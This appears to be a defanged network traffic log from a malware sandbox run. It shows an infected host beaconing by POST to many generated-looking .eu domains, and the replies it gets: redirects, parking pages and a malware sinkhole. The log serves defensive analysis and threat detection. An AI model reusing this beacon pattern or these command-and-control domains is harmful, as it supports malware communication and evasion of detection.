User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:55 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.nozulufynax.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:55 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.nozulufynax.eu..Vary: Accept-Encoding..
GET /90623dde15463e9fb45001ad5063db65 HTTP/1.1
Host: xsso.nopegymozow.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu
19..Landed nopegymozow.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=e90c55b2c9a14c217bf26ca73db4527f; Expires=Fri, 18 Nov 2022 09:08:59 GMT
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:39 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.qetuluvolos.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:39 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.qetuluvolos.eu..Vary: Accept-Encoding......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:43 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.qetuluvolos.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:43 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.qetuluvolos.eu..Vary: Accept-Encoding..
GET /domain/rynazuqihoj.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu
Location: hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888
3e..Go hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.galokusemus.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.galokusemus.eu..Vary: Accept-Encoding..
GET /4abc123f5bc1fe014bbeb686d9306960 HTTP/1.1
Host: xsso.marytymenok.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu
19..Landed marytymenok.eu<br>..0..
GET /domain/vofozymufok.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu
Location: hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2
3e..Go hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynyhipexon.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:11 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.rynyhipexon.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:11 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.rynyhipexon.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.dimutobihom.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.dimutobihom.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.norumikemem.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.norumikemem.eu..Vary: Accept-Encoding..
GET /f2c2596452aa9379694886959d3b2888 HTTP/1.1
Host: xsso.rynazuqihoj.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu
19..Landed rynazuqihoj.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.qebahilojam.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.qebahilojam.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/jewuqyjywyv.eu
Set-Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /71c55851e5901a95263b027885fa0411 HTTP/1.1
Host: xsso.jewuqyjywyv.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu
19..Landed jewuqyjywyv.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qekikyvutic.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:19 GMT
Server: Apache
Set-Cookie: vsid=909vr1955561591417248; expires=Wed, 18-Nov-2020 09:09:19 GMT; path=/; domain=ww92.qekikyvutic.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qekikyvutic.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qekikyvutic.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.qexofyqihid.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.qexofyqihid.eu..Vary: Accept-Encoding..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.puregivytoh.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>puregivytoh.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'puregivytoh.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0My40MTgxOjZlM2E5MWJiY2MzZjAxNTY1ZmNmM2ZjNGIyNGFjMmMyYjRlZTFhMTJlZDFlNTI4ZGUxODRhOWVlMTNiYTViYTE6NTY0ZWUzMmY2NjE2Mw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMyZjY1MGFmfHx8MTQ0ODAxMDU0My40MjJ8NWVhN2YzMjZmNjRmYWVhOTY0M2U3MGZkMzZlNzg5OTA3MmU4NTliN3x8fHx8MXx8fDB8NTY0ZWUzMmY4YWJmODJjZjM3OGI2MGFmfHx8MHx8fHx8fDB8fHx8fHx8fHw=';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
X-Sinkhole: Malware sinkhole
Content-Type: text/html
Server: nginx/0.7.65
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Length: 0
HTTP/1.1 200 OK..X-Sinkhole: Malware sinkhole..Content-Type: text/html..Server: nginx/0.7.65..Date: Fri, 20 Nov 2015 09:09:00 GMT..Content-Length: 0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.tufecagemyl.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:05 GMT
Server: Apache
Set-Cookie: vsid=910vr1955561452511509; expires=Wed, 18-Nov-2020 09:09:05 GMT; path=/; domain=ww92.tufecagemyl.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=106
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.tufecagemyl.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.tufecagemyl.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.lykemujebeq.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>lykemujebeq.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'lykemujebeq.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40MTkxOjE1YmU1MTI1NmIwMmNjOGVjOTIyNDFiNDdhNTAzYTczYjRjNzZkOWE1NDkxMWFlMGY3MGE3ODg3ZTM2YjEwOWU6NTY0ZWUzMzA2NjU3MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDYzM2QyfHx8MTQ0ODAxMDU0NC40MjM0fGQ5OWFlODRlM2MzYzY0MmVlY2M3YzlkNjhkMWQ1MDhlMDkwZWZiZGF8fHx8fDF8fHwwfDU2NGVlMzMwODhmYmNlMTBiMDhiNDliZnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.qebahilojam.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>qebahilojam.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'qebahilojam.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40ODQyOjI4NjJkMzUzYzZlNDExYzJkYTc3M2UyOTZiOTdlNzk0MzQ2N2EwNmU0NWMwOWVkNGNjYWVkNzBiODQzYzJhN2I6NTY0ZWUzMzA3NjNjMA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDc0ODhkfHx8MTQ0ODAxMDU0NC40OTA1fDQzZTM0ZWMyNzk5ZjhjZDM1YWIyYjU1ZTZhZDdmZjcxMjNkNmQ4ZGV8fHx8fDF8fHwwfDU2NGVlMzMwZjg1MjVmZjY0YzhiNmQ2M3x8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.galokusemus.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:24 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
